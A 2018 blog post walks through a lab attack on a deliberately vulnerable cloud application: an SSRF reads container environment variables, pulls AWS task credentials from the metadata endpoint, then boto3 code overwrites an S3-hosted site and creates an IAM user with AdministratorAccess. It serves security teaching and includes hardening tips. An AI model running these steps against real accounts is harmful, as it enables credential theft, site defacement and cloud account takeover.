Privilege escalation in the Cloud: From SSRF to Global Account Administrator

Maxime Leblanc
poka-techblog
Published in
6 min readSep 1, 2018

--

In my previous stories, I explored different techniques for exploiting Server-Side Request Forgeries (SSRF), which can lead to unauthorized access to various resources within the internal network of a Web server. In some circumstances, SSRFs can event lead to API keys or database credentials getting compromised. In this story, I wish to show you that in the context of a Cloud application, the consequences of successful attack that uses this technique are decoupled. An attacker that can effectively leverage an SSRF on the right resource could gain complete access to one’s AWS account, and the only limit of what you can do from there is bound by your imagination. Spin a couple of c5.xlarge to harvest Bitcoins? Host a malware delivery network over S3? Your choice…

The DVCA Lab Environment

For this experiment, I have developed the DVCA (Damn Vulnerable Cloud Application), which is available on GitHub and has been inspired by the Damn Vulnerable Web Application project. DO NOT deploy this in your environment if you haven’t hardened it by restraining security groups to your own IP and/or change the IAM Roles given in the project. At the moment of writing, it is made of a static S3-hosted website delivered over SSL by CloudFront. You can choose wether you want a serverless backend using an API Gateway and a Lambda function, an ECS Fargate backend running a Flask container or a Classic EC2 backend running this same container. For the purpose of this article, I will concentrate on the Fargate backend.

The Damn Vulnerable Cloud Application architecture

From the outside, it all seems fair, HTTPS is active on both the frontend and the backends, the website is static and therefore protected from classic attacks like SQL Injections or Wordpress plugin vulnerabilities…

The DVCA interface

The SSRF is done through a Webhook tester, like in my first story about the subject. All backends are coded in the way that they receive an URL, read it using urllib and returns the result to the frontend, which displays it in the “debugger” frame.

Roles and Permissions in AWS EC2/ECS

In order to assume a role and effectively gain permissions relative to AWS resources, you will need three pieces of information: An AccessKey, a SecretKey, and a SessionToken, in the case that the credentials were issued by the Security Token Service (STS). In an EC2 or ECS infrastructure, each VM/Task can have a particular set of permission; For example, if your Web application needs to upload files to an S3 Bucket, you will need to assign it the s3:PutObject permission over the bucket. This means that our Fargate containers also need to get credentials from STS in order to do their job, if it implies calling AWS resources.

In a classic EC2 scenario, the credentials for a particular instance can be fetched by the EC2 instance (and only from there, since the endpoint is not public) from the Metadata URL: http://169.254.169.254/latest/meta-data/iam/security-credentials/. Note that you can also fetch quite a lot of sensitive informations from this IP, like UserData scripts that are likely to contain API keys and other secrets.

In the case of an ECS Task, the credentials can be retrieved from a different endpoint: http://169.254.170.2/v2/credentials/<SOME_UUID>. The UUID in question can be found in the environment variables of the container, more specifically theAWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable.

Abusing the IAM Services through SSRFs

Since the STS service is available through normal HTTP endpoints, we can trick the Fargate backend into making arbitrary requests to these endpoints, and the Frontend will happily display the result to us. But how could-we find the credentials UUID needed for the request? Well, in my other SSRF story, I showed that you can read a file using the file:// scheme. So assuming the backend is a Linux-based server, you can read the environment variables by pointing your request to file:///proc/self/environ.

The relative URL for retrieving the credentials, including the UUID, can be found in /proc/self/environ

Yay! Now, we can use this URI to retrieve credentials:

Credentials retrieved from an SSRF request

Using the credentials

In order to use these credentials in a creative manner, I would suggest to use boto3, the Python SDK for interacting with the AWS Api. Upon creating the boto3 client object, the constructor accepts credentials as parameters, so we can pass it those received from our SSRF:

sts_client = boto3.client(
'sts',
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
aws_session_token=session_token,
)

Now, to be sure that our credentials work and that we have effectively elevated privileges, the STS service has an AWS equivalent to the whoami command: get-caller-identity. Let’s verify:

> print(sts_client.get_caller_identity()['Arn'])
> arn:aws:sts::0123456789:assumed-role/DVCA-Fargate-Backend-DVCATaskRole-CLOUDFORMATION_ID/SOME_UUID

Bingo! Now my laptop is considered by AWS like the Fargate backend of my application, meaning I have access to everything it has access. Reagarding S3 for example, the backend ECS Task has this set of permissions defined:

- Effect: Allow
Action:
- s3:GetObject
- s3:PutObject
- s3:ListBucket
Resource: '*' # Tip: Try to never wildcard access to resources

Now, if the domain name of the DVCA is a “root” domain (that has no subdomain), chances are that the underlying S3 Bucket name is the same as the domain name, because of the way Route53 Alias Records makes it just easier to work this way. We can use this to modify the static website and inject a rogue mining script in it (for example), effectively defacing the static S3 website!

s3_client = boto3.client(
's3',
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
aws_session_token=session_token,
)
s3_client.put_object(Body=rogue_bytes, Bucket='domain.name', Key='index.html')

Also note that s3:ListBucket permission which also enables the serverless equivalent of directory listing…

Taking over

Let’s say your Web Application has the right to create roles (a role for each customer, for example) and that this permission was implemented as

- Effect: Allow
Action:
- iam:* # Living dangerously
Resource: '*'

(Very dangerous, but I am sure there are plenty of way too permissive implementations of this in the wild) for the sake of simplicity. Using the credentials retrieved through our SSRF technique and passing them to boto3 we are able to create a new Global Administrator user and create him Access Keys in just a few lines of python:

iam_client = boto3.client(
'iam',
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
aws_session_token=session_token,
)
iam_client.create_user(
UserName='DVCA-RogueUser'
)
iam_client.attach_user_policy(
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess',
UserName='DVCA-RogueUser',
)
key_response = iam_client.create_access_key(UserName='DVCA-RogueUser')

In this example, the keys will be in the key_response object, which you can just print-out.

At this point, you won. You basically own everything in this account.

A rogue administrator user created using the backend’s credentials

Future work: The Lambda Backend

Even though I included a serverless Lambda backend in DVCA, I was not able to exploit it yet. In this case, the credentials are injected directly in Python's os.environ, but are not part of /proc/self/environ or /proc/self/task/1/environ. I know that they are injected at the bootstrap using lambda_runtime.receive_start(), but I am not sure they are anywhere to be found on the filesystem. AWS Lambdas also do not have a metadata endpoint from which we could fetch them. My next hypothesis would be to try to retrieve them from memory, by looking at /proc/self/map* files.

So if you have an idea, drop a comment below!

Happy hacking! :-)

--

--